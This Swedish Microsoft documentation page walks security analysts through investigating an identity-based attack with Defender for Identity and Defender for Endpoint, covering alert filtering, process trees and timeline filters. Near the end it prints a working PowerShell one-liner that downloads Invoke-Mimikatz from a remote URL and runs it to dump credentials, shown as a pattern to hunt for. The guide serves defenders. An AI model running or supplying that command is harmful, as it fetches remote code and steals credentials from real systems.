Dela via


Exempel på en identitetsbaserad attack

Gäller för:

  • Microsoft Defender XDR

Microsoft Defender for Identity kan hjälpa dig att identifiera skadliga försök att kompromettera identiteter i din organisation. Eftersom Defender för identitet integreras med Microsoft Defender XDR kan säkerhetsanalytiker få insyn i hot som kommer in från Defender för identitet, till exempel misstänkta försök att utöka Netlogon-privilegier.

Analysera attacken i Microsoft Defender for Identity

Microsoft Defender XDR låter analytiker filtrera aviseringar efter identifieringskälla på fliken Aviseringar på sidan Incidenter. I följande exempel filtreras identifieringskällan till Defender for Identity.

Filtrera identifieringskällan i Microsoft Defender for Identity

Om du väljer aviseringen Misstänkt överpass-the-hash-attack går du till en sida i Microsoft Defender for Cloud Apps som visar mer detaljerad information. Du kan alltid ta reda på mer om en avisering eller attack genom att välja Läs mer om den här aviseringstypen för att läsa en beskrivning av attack - och reparationsförslagen.

En misstänkt överfart-hash-attackvarning

Undersöka samma attack i Microsoft Defender för Endpoint

En analytiker kan också använda Defender för Endpoint för att lära sig mer om aktiviteten på en slutpunkt. Välj incidenten i incidentkön och välj sedan fliken Aviseringar . Härifrån kan de också identifiera identifieringskällan. En identifieringskälla märkt som EDR står för Endpoint Detection and Response, som är Defender för Endpoint. Härifrån väljer analytikern en avisering som identifierats av EDR.

Slutpunktsidentifiering och svar i Microsoft Defender för Endpoint-portalen

På aviseringssidan visas olika relevanta uppgifter, till exempel det berörda enhetsnamnet, användarnamnet, statusen för automatisk undersökning och aviseringsinformationen. Aviseringsartikeln visar en visuell representation av processträdet. Processträdet är en hierarkisk representation av överordnade och underordnade processer som är relaterade till aviseringen.

Ett aviseringsprocessträd i Microsoft Defender för Endpoint

Varje process kan utökas för att visa mer information. Information som en analytiker kan se är de faktiska kommandon som angavs som en del av ett skadligt skript, utgående anslutnings-IP-adresser och annan användbar information.

Processinformationen i Microsoft Defender för Endpoint-portalen

Genom att välja Se i tidslinjen kan en analytiker öka detaljnivån ytterligare för att fastställa den exakta tiden för kompromissen.

Microsoft Defender för Endpoint kan identifiera många skadliga filer och skript. Men på grund av många legitima användningsområden för utgående anslutningar, PowerShell och kommandoradsaktivitet anses en viss aktivitet vara oskadlig tills den skapar en skadlig fil eller aktivitet. Därför hjälper användning av tidslinjen analytiker att sätta aviseringen i kontext med den omgivande aktiviteten för att fastställa den ursprungliga källan eller tiden för attacken som annars skyms av vanligt filsystem och användaraktivitet.

För att använda tidslinjen skulle en analytiker starta vid tidpunkten för aviseringsidentifieringen (i rött) och rulla nedåt bakåt i tiden för att avgöra när den ursprungliga aktiviteten som ledde till den skadliga aktiviteten faktiskt startade.

Analytikerns starttid för aviseringsidentifieringen

Det är viktigt att förstå och särskilja gemensam aktivitet, till exempel Windows Update anslutningar, Aktiveringstrafik för Betrodd programvara i Windows, andra vanliga anslutningar till Microsoft-webbplatser, Internetaktivitet från tredje part, Microsoft Endpoint Configuration Manager-aktivitet och annan godartad aktivitet från misstänkt aktivitet. Ett sätt att urskilja är att använda tidslinjefilter. Det finns många filter som kan markera specifik aktivitet när du filtrerar bort allt som analytikern inte vill visa.

I bilden nedan filtrerade analytikern för att endast visa nätverks- och processhändelser. Med det här filterkriterierna kan analytikern se nätverksanslutningar och processer kring händelsen där Anteckningar upprättade en anslutning med en IP-adress, som vi också såg i processträdet.

Hur Anteckningar användes för att skapa en skadlig utgående anslutning

I den här händelsen användes Anteckningar för att skapa en skadlig utgående anslutning. Angripare använder dock ofta iexplorer.exe för att upprätta anslutningar för att ladda ned en skadlig nyttolast eftersom normalt iexplorer.exe processer betraktas som vanlig webbläsaraktivitet.

Ett annat objekt att söka efter i tidslinjen är powershell-användning för utgående anslutningar. Analytikern skulle leta efter lyckade PowerShell-anslutningar med kommandon, till exempel följt av en utgående anslutning till en webbplats som IEX (New-Object Net.Webclient) är värd för en skadlig fil.

I följande exempel användes PowerShell för att ladda ned och köra Mimikatz från en webbplats:

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

En analytiker kan snabbt söka efter nyckelord genom att skriva in nyckelordet i sökfältet för att endast visa händelser som skapats med PowerShell.

Nästa steg

Se sökvägen för nätfiskeundersökning .

Se även

Tips

Vill du veta mer? Engage med Microsofts säkerhetscommunity i vår Tech Community: Microsoft Defender XDR Tech Community.